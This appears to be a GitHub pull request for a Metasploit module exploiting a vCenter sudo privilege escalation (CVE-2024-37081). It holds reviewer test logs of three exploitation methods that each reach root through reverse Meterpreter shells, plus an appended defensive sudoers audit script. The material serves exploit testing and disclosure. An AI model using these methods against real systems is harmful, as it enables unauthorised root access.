
vCenter Sudo LPE (CVE-2024-37081) #19402

Merged: 8 commits, Dec 5, 2024

Conversation

h00die (Contributor) commented Aug 20, 2024

Module to exploit CVE-2024-37081. Also updates the ssh platform and vcenter libs to handle newer version of vcenter and photon OS

Due to the multiple methods, please see the Docs on how to test each one. If your install borks like mine, see workaround instructions as well. It took me 4 install attempts to get this to finish installing. ESXi installs failed, VMWare Workstation eventually succeeded but you need to fill in the networking information by hand during the VM creation.

@h00die h00die added the module label Aug 20, 2024
h00die (Contributor Author) commented Sep 29, 2024

Haven't forgotten about this, my ESXi server which should be vulnerable has a failing drive, so I'm waiting for the replacements to come in before attempting any more than absolutely necessary disk writes.

h00die (Contributor Author) commented Nov 18, 2024

Again, haven't forgotten about this, getting vcenter and having it install correctly was more of an effort than in previous versions. However, I have it (mostly? seems to have not completed install/setup, but seems functional enough) installed at this point and am making progress.

  1. pod user method is now working.
  2. Also updated platform to handle new versions of vcenter via ssh.

h00die (Contributor Author) commented Nov 19, 2024

The operator method now works.

My install, as previously noted, is borked. I didn't have an admin user, or the dcli binary that is supposed to be on the box. During the 'setup' portion of the install (after first boot, after getting the yellow/black screen where you can change nic settings/enable ssh/enable shell), I went to the website and it says it's Stage 1: Installed vmware-certificate-server-8.0.0.10000-10433816.x86_64.rpm. Reboot, nothing, can't get it to progress.

So I'm putting this up for review, I didn't test the last method, but it looks ok. Hopefully whoever tests this can get a working install. I'll keep trying, but not sure when I'll get around to it again (may be a week or two).

@h00die h00die marked this pull request as ready for review November 19, 2024 01:13
h00die (Contributor Author) commented Nov 21, 2024

4th time's a charm, see note in description about install on VMware Workstation. All exploit methods tested, validated the check method as well.

@jheysel-r7 jheysel-r7 self-assigned this Dec 3, 2024
@jheysel-r7 jheysel-r7 added docs rn-modules release notes for new or majorly enhanced modules labels Dec 3, 2024
jheysel-r7 (Contributor) left a comment

Thanks for another great module with great documentation to go with it @h00die. I also had issues fully installing the application and the vulnerable users weren't created so the extra documentation was helpful.

Testing was expected for each of the vulnerable user/group configurations. Just a couple minor suggestions.

Testing version 8.0.0.20519528

Pod

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (pod:["pod"]) are vulnerable
[*] Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.
[*] Creating directory /tmp/appliance
[*] /tmp/appliance created
[*] Writing '/tmp/appliance/pPzp9qSV' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/pPzp9qSV
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 5 opened (192.168.1.67:4444 -> 192.168.1.102:46654) at 2024-12-03 17:07:29 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Operator1

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (operator1:["users", "operator"]) are vulnerable
[*] Utilizing PYTHONPATH exploitation method for operator group.
[*] Writing '/tmp/y0iQZJzY' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/y0iQZJzY
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.102:46908) at 2024-12-03 17:12:32 -0800


meterpreter >
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Admin Group

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Exploitable version detected: 8.0.0.20519528
[+] User is vulnerable
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.
[*] Creating directory /tmp/appliance
[*] /tmp/appliance created
[*] Writing '/tmp/appliance/73kTyaqbNk' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/73kTyaqbNk
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.102:46328) at 2024-12-03 17:00:54 -0800

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

Review comment on modules/exploits/linux/local/vcenter_sudo_lpe.rb (outdated, resolved)
Review comment on modules/exploits/linux/local/vcenter_sudo_lpe.rb (outdated, resolved)
h00die (Contributor Author) commented Dec 4, 2024

Changes seem reasonable, it'll be a day or two until I can apply and test.

h00die (Contributor Author) commented Dec 4, 2024

Had a free moment, implemented changes. Only tested against pod but still working.

jheysel-r7 (Contributor) left a comment

Thanks @h00die! I gave them all one last test and everything was working as expected 🚀

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[-] Handler failed to bind to 192.168.1.65:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (pod:["pod"]) are vulnerable
[*] Writing '/tmp/appliance/MAXOnji' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[*] Meterpreter session 3 opened (192.168.1.65:4444 -> 192.168.1.102:42930) at 2024-12-04 18:04:53 -0800

[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/vcenter_sudo_lpe) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

msf6 exploit(linux/local/vcenter_sudo_lpe) > run

[*] Started reverse TCP handler on 192.168.1.65:6464
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (operator1:["users", "operator"]) are vulnerable
[*] Writing '/tmp/aiYdGGZ' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/aiYdGGZ
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 7 opened (192.168.1.65:6464 -> 192.168.1.102:59130) at 2024-12-04 18:10:37 -0800


meterpreter >
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

msf6 exploit(linux/local/vcenter_sudo_lpe) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.65:6464
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable
[*] Writing '/tmp/appliance/NsmByF' (250 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.102
[+] Deleted /tmp/appliance/NsmByF
[+] Deleted /tmp/appliance/__init__.py
[+] Deleted /tmp/appliance
[*] Meterpreter session 10 opened (192.168.1.65:6464 -> 192.168.1.102:59770) at 2024-12-04 18:23:50 -0800
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : vcenter.test.com
OS           : VMware Photon OS 3.0 (Linux 4.19.232-4.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit e8911f9 into rapid7:master Dec 5, 2024
68 checks passed
jheysel-r7 (Contributor) commented:

Release Notes

VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. This adds a post module to exploit these vulnerabilities.
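As an added example from the defender's side (not code from this pull request or from the Metasploit module it adds), the Ruby audit below scans sudoers text for the combination the test output above points at: a non-root user or group allowed to run Python as root while PYTHONPATH, VMWARE_PYTHON_PATH or VMWARE_PYTHON_BIN is preserved through `env_keep` or settable through `SETENV`. The variable names are taken from the exploitation method names in the test logs; that the misconfiguration takes this env_keep/SETENV shape is an assumption of the example, and the sudoers sample is constructed, not copied from any appliance.

```ruby
# Added example: a defender-side audit of sudoers text. Not part of this
# pull request or of the Metasploit module it adds. The variable names come
# from the exploitation method names in the PR's test output; that the sudo
# misconfiguration takes the form of env_keep / SETENV rules on Python
# commands is an assumption made for this example.

RISKY_VARS = %w[PYTHONPATH VMWARE_PYTHON_PATH VMWARE_PYTHON_BIN].freeze

# Constructed sample sudoers content, modelled only loosely on the user and
# group names seen in the PR's test output. Not copied from any appliance.
SAMPLE_SUDOERS = <<~SUDOERS
  Defaults env_reset
  Defaults env_keep += "VMWARE_PYTHON_PATH VMWARE_PYTHON_BIN"
  root ALL=(ALL) ALL
  pod ALL=(root) NOPASSWD: /usr/bin/python3 /opt/tool/pod_task.py
  %operator ALL=(root) NOPASSWD:SETENV: /usr/bin/python3 /opt/tool/op_task.py
  %admin ALL=(root) NOPASSWD: /usr/bin/systemctl restart vmware-vpxd
  backup ALL=(root) NOPASSWD: /usr/bin/tar -cf /backup/etc.tar /etc
SUDOERS

Finding = Struct.new(:line, :kind, :detail)

# Pass 1: which risky variables survive env_reset via "Defaults env_keep".
# Only additions ("=" / "+=") count; "env_keep -=" removes and is ignored.
def kept_risky_vars(text)
  kept = []
  text.each_line do |raw|
    line = raw.strip
    next unless line.start_with?('Defaults')
    next unless (m = line.match(/\benv_keep\s*\+?=\s*"?([^"]*)"?/))
    kept.concat(m[1].split & RISKY_VARS)
  end
  kept.uniq
end

# Pass 2: flag user/group rules that run a command as root while either
# keeping a risky Python variable or letting the caller choose its own env.
def audit_sudoers(text)
  kept = kept_risky_vars(text)
  findings = []
  text.each_line.with_index(1) do |raw, lineno|
    line = raw.strip
    next if line.empty? || line.start_with?('#', 'Defaults')
    # who  host=(runas) [TAG:...] commands
    next unless (m = line.match(/\A(\S+)\s+([^\s=]+)\s*=\s*\(([^)]*)\)\s*(.*)\z/))
    who, runas, rest = m[1], m[3], m[4]
    next if who == 'root'
    runas_users = runas.split(':').first.to_s.split(',').map(&:strip)
    next unless runas_users.include?('root') || runas_users.include?('ALL')

    tags = rest[/\A((?:[A-Z]+:\s*)+)/, 1].to_s.split(':').map(&:strip).reject(&:empty?)
    commands = rest.sub(/\A(?:[A-Z]+:\s*)+/, '')
    runs_python = commands.match?(/python/i)

    if tags.include?('SETENV')
      findings << Finding.new(lineno, :setenv,
                              "#{who} controls the environment of '#{commands}' run as root")
    end
    if runs_python && !kept.empty?
      findings << Finding.new(lineno, :python_env_keep,
                              "#{who} runs Python as root with #{kept.join(', ')} preserved")
    end
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  audit_sudoers(SAMPLE_SUDOERS).each do |f|
    puts "line #{f.line} [#{f.kind}]: #{f.detail}"
  end
end
```

On the constructed sample this reports the pod rule (Python as root with the VMware Python variables kept) and the operator rule twice (SETENV plus the kept variables), while the admin and backup rules, which run no Python, are left alone. To use it on a real host, feed it the contents of `/etc/sudoers` and each file under `/etc/sudoers.d/`; the two-pass design matters because `Defaults` lines may appear anywhere in those files, not only before the rules they affect.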

@h00die h00die deleted the vcenter_privesc branch December 5, 2024 11:01